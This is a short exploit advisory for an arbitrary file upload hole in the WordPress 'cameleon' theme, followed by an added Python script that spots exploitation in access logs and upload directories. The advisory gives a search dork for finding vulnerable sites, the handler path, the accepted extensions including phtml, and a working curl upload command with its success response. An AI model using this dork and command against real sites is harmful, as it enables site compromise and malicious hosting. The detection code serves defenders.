WordPress theme cameleon arbitrary file upload
Tested on: Ubuntu 18.04
Software download: https://id.wordpress.org/themes/the-chameleon/
Dork: inurl:/wp-content/themes/cameleon
Exploit: /wp-content/themes/cameleon/includes/fileuploader/upload_handler.php
Upload extensions: phtml, html, txt, jpg, png
Upload location: /wp-content/uploads/[year]/[month]/yourfile.html
POC:
curl -v -F "qqfile=@yourfile.html" http://vuln.com/wp-content/themes/cameleon/includes/fileuploader/upload_handler.php
Response on successful exploitation:
{"success":true,"url":"http:\/\/vuln.com\/wp-content\/uploads\/[year]\/[month]\/file.html","path":"\/home\/user\/public_html\/wp-content\/uploads\/[year]\/[month]\/"}
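Added detection example for defenders (not part of the original advisory, not the theme's own code): it scans web-server access-log lines for POST requests to the upload_handler.php path named above and flags files under wp-content/uploads whose extension is one the handler accepts but is not an image type. The log lines, file paths and log format are constructed assumptions for the example.

```python
"""Defender-side checks for the cameleon theme upload handler described in
the advisory above (added example, not the advisory's or the theme's code)."""
import re
from typing import Iterable, List, Tuple

# Path of the vulnerable handler, taken from the advisory.
UPLOAD_HANDLER = "/wp-content/themes/cameleon/includes/fileuploader/upload_handler.php"

# Extensions the advisory says the handler accepts; anything other than an
# image type landing in a WordPress media directory deserves review.
ACCEPTED_EXTENSIONS = {"phtml", "html", "txt", "jpg", "png"}
IMAGE_EXTENSIONS = {"jpg", "png"}

# Apache/nginx "combined" log format (assumption: standard field order).
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<path>\S+) [^"]*" (?P<status>\d{3}) '
)


def find_upload_handler_posts(lines: Iterable[str]) -> List[Tuple[str, str, int]]:
    """Return (ip, timestamp, status) for every POST to the upload handler."""
    hits = []
    for line in lines:
        m = LOG_RE.match(line)
        if not m:
            continue  # skip lines that do not parse as combined log format
        path = m["path"].split("?", 1)[0]  # ignore any query string
        if m["method"] == "POST" and path == UPLOAD_HANDLER:
            hits.append((m["ip"], m["ts"], int(m["status"])))
    return hits


def find_suspicious_uploads(paths: Iterable[str]) -> List[str]:
    """Return paths under wp-content/uploads whose extension the handler
    accepts but which is not an image type (phtml/html/txt)."""
    suspicious = []
    for p in paths:
        if "/wp-content/uploads/" not in p:
            continue
        ext = p.rsplit(".", 1)[-1].lower() if "." in p else ""
        if ext in ACCEPTED_EXTENSIONS and ext not in IMAGE_EXTENSIONS:
            suspicious.append(p)
    return suspicious


# Constructed sample data (not real traffic or real files).
SAMPLE_LOG = [
    '203.0.113.5 - - [10/Oct/2023:13:55:36 +0000] "GET /index.php HTTP/1.1" 200 5120 "-" "Mozilla/5.0"',
    '203.0.113.5 - - [10/Oct/2023:13:55:40 +0000] "POST /wp-content/themes/cameleon/includes/fileuploader/upload_handler.php HTTP/1.1" 200 173 "-" "curl/7.68.0"',
    '198.51.100.9 - - [10/Oct/2023:13:56:01 +0000] "GET /wp-content/uploads/2023/10/yourfile.html HTTP/1.1" 200 312 "-" "Mozilla/5.0"',
    "garbage line that does not parse",
]

SAMPLE_UPLOADS = [
    "/home/user/public_html/wp-content/uploads/2023/10/photo.jpg",
    "/home/user/public_html/wp-content/uploads/2023/10/yourfile.html",
    "/home/user/public_html/wp-content/uploads/2023/10/notes.txt",
    "/home/user/public_html/wp-content/themes/cameleon/style.css",
]

if __name__ == "__main__":
    for ip, ts, status in find_upload_handler_posts(SAMPLE_LOG):
        print(f"upload handler POST from {ip} at {ts} -> HTTP {status}")
    for p in find_suspicious_uploads(SAMPLE_UPLOADS):
        print(f"review non-image upload: {p}")
```

Run it against real access logs and a listing of the uploads directory (for example from find) to get a first triage list; the second check is the more useful one after the fact, since the upload handler itself can be blocked or removed while files already written to wp-content/uploads remain servable.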
Greets:
Allah,ProblemCyberTeam,All my friends